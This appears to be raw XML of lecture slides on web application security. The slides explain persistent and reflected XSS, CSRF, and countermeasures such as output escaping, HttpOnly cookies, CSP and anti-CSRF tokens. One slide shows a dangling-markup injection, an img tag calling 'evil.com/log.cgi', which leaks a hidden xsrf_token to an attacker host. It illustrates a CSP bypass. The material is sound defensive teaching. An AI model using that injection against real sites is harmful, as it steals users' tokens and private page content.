                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Cross-Site Malicious Content</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ents (e.g., web browsers) typically presume that server </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>intended</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> to send data it sen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secure programs (e.g., web apps) accept data &amp; pass that data on to a user’s application (the victi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he secure program doesn't protect the victim, the victim's application (e.g., their web browser) may then process that data in a way harmful to the victi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rver isn’t subverted directly… but used as a pass-through to victim</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 called “CSS” (= Cascading Style Sheets)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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6525-B5C8-4507-8AB4-7BAD3981DA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0456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e security-related feedback to untrusted user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Login failed” – don’t say wh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 that instea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n’t logged in… especially untrus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oint is to prevent attackers from figuring out valid usernames; if usernames are already public, don’t worry about hiding whether or not usernames are vali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echo passwords on-scre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hibits shoulder surfing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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1A71-A7D7-481E-8B15-C8FF962D47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XSS – Persistent Store Example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4647960"/>
            <a:ext cx="8229600" cy="1477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persistent-store XSS, attacker sends data to server that is stored by server for later us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victim requests, server includes malicious data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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20B8-FD87-4364-A37B-8FDC6AF79A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0" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909880" y="182880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Server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649440" y="3352680"/>
            <a:ext cx="236196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lo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icious user)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5302080" y="335268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ic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browser</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Can 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467480" y="1562040"/>
            <a:ext cx="1371600" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>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base</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="154" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="151" idx="0"/>
            <a:endCxn id="150" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1829880" y="2323800"/>
            <a:ext cx="1080360" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76320" y="1832040"/>
            <a:ext cx="281916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lory sends malicious data (e.g., HTML comment with malicious script in it)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="156" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="150" idx="3"/>
            <a:endCxn id="153" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5272200" y="1828440"/>
            <a:ext cx="2196000" cy="496080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:headEnd len="med" type="arrow" w="med"/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="TextBox 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442120" y="1677960"/>
            <a:ext cx="201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ata stored &amp; later retrieved</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="158" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="150" idx="3"/>
            <a:endCxn id="152" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5272200" y="2323800"/>
            <a:ext cx="1211760" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5373720" y="2428920"/>
            <a:ext cx="361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ice requests info (e.g., view comments), &amp; receives malicious code (that may be auto-run)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="Picture 17" descr="nuclear explosion by tzunghaor - "/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7120080" y="3521160"/>
            <a:ext cx="533160" cy="641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XSS –Reflection Example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4647960"/>
            <a:ext cx="8229600" cy="1477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reflected XSS, attacker sends data to victim so victim will send it on to serv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ten a special hypertext link or web form pointed to trusted server</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er then reflects data back; victim browser sees data “from” the server &amp; trusts it</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="20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88CB-9F98-4126-A526-AD7AAF3D05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4" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909880" y="182880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Server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649440" y="3352680"/>
            <a:ext cx="236196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lo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icious user)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5302080" y="335268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ic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browser</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="167" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="165" idx="3"/>
            <a:endCxn id="166" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3011040" y="3847680"/>
            <a:ext cx="2291400" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051000" y="3352680"/>
            <a:ext cx="2210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allory sends malicious data to Alice (e.g., in a hypertext link/form)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="169" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="166" idx="0"/>
            <a:endCxn id="164" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5271840" y="2323800"/>
            <a:ext cx="1211760" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181480" y="2438280"/>
            <a:ext cx="118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lice sends on to server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="171" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="164" idx="3"/>
            <a:endCxn id="166" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5272200" y="2323800"/>
            <a:ext cx="1211760" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248520" y="1828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ice receives malicious data “reflected back” to her… and trusts it</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Picture 17" descr="nuclear explosion by tzunghaor - "/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7120080" y="3521160"/>
            <a:ext cx="533160" cy="641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ering XSS</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utput escapin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trusted user data should be escaped before sending to use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void copying data back to user (if URL bad, don’t send it back – legitimate user can see it alread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put filtering for metacharacter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acharacters include &lt;, &amp;, &g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bid/remove/quote on inpu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t always do th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libraries for HTML input (e.g., to allow &lt;i&gt;…&lt;/i&gt; without allowing embedded Javascript)</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t HttpOnly on cookies s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b browser scripts can’t access these cookie valu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erfect defense, but can make some attacks harder</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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BA5A-2438-4C31-8F6D-F9AB7A2996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er XSS countermeasure:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</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nt Security Policy (CSP) is W3C Candidate Recommend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s “Content-Security-Policy” HTTP head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used, creates whitelist of sources of trusted content for this webpag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iant browsers only execute/render items (Javascript) from those sources</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hrome 16+, Safari 6+, and Firefox 4+.  IE 10 has very limited support</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witter and Facebook have deployed thi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ically must modify website design to fully use i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g., move Javascript into separate files, otherwise receiving browser can’t distinguish whitelisted &amp; malicious Javascrip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works when users use compliant brows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ct CSP to grow additional capabil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info:</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2060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.html5rocks.com/en/tutorials/security/content-security-polic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2060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.w3.org/TR/CSP/</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2060"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.twitter.com/2011/improving-browser-security-csp</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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F3F6-C4B8-4C7A-B9FB-9C3AF8A99F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 Security Policy (CSP) helps, but is no panacea</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SP is a useful defensive measure, but can sometimes be worked aroun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evil URL:</a:t>
            </a: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t;img src='http://evil.com/log.cgi?   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Injected line, non-terminated param</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t;input type="hidden" name="xsrf_token" value="12345"&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Secre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000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Normally-occurring apostroph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user views, evil.com receives a lot of the following text (including text that was supposed to be hidd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output escaping &amp; input filtering; then use defensive measures (like CSP) to counter mistakes</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2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urce: “Postcards from the post-XSS world” by Michal Zalewski, http://lcamtuf.coredump.cx/postxss/</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>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66FCA-97D9-480C-BE37-667DFA67D0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ss-Site Request Forgery (CSRF/XSRF)</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oss-site request forgery (CSRF/XSRF) essentially opposite of XSS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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SS exploits user’s trust in a server</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SRF/XSRF exploits server’s trust in a client</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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CSRF/XSRF:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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tacker tricks user into sending data to server</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rver believes that user consciously &amp; intentionally chose that action</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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XSS fools </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>clients</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>; XSRF fools </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>servers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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6819-F447-4B5B-84A7-0E3AD5B75E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ss-Site Request Forgery (CSRF/XSRF) Example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4647960"/>
            <a:ext cx="8229600" cy="20574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CSRF/XSRF, like reflected XSS, attacker sends data to victim so victim will send it on to serve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acker’s approach is in many ways like reflected XS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tacker’s purpose is for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> to act on the command</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is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> – difference from X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BC8A-5FF3-4AD4-B313-E0CA270518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9" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909880" y="182880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Server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649440" y="3352680"/>
            <a:ext cx="236196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lo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icious user)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5302080" y="3352680"/>
            <a:ext cx="236232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ic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b browser</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="192" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="190" idx="3"/>
            <a:endCxn id="191" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3011040" y="3847680"/>
            <a:ext cx="2291400" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="TextBox 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051000" y="3352680"/>
            <a:ext cx="2210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allory sends malicious data to Alice (e.g., in a hypertext link/form)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="194" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="191" idx="0"/>
            <a:endCxn id="189" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5271840" y="2323800"/>
            <a:ext cx="1211760" cy="1028880"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:tailEnd len="med" type="arrow" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="213372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lice sends on to server; server acts on command “sent” by Alice</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="Picture 17" descr="nuclear explosion by tzunghaor - "/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724280" y="1981080"/>
            <a:ext cx="533520" cy="641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ering CSRF/XSRF</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quire authentication data in same HTTP Request in critical operation</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quire secret user-specific token in all forms/side-effect URLS (attacker doesn’t know, so can’t put in token)</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eck HTTP Referer or Origin header</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you do that, “no Referer” must be treated as unauthorized (attacker can suppress Referer)</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client vulnerabilities may subvert this</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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se CSRF countermeasures in login - prevent login forgery</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elpful partial countermeasures (make harder to attack):</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goff after X minutes inactivity</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n’t allow GET (link) to have side-effects - only POST (button)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="22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XSS vulnerabilities allow bypass of CSRF countermeasures</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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782C-A632-43A5-9DED-09D4DD1EBE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direction</a:t>
            </a:r>
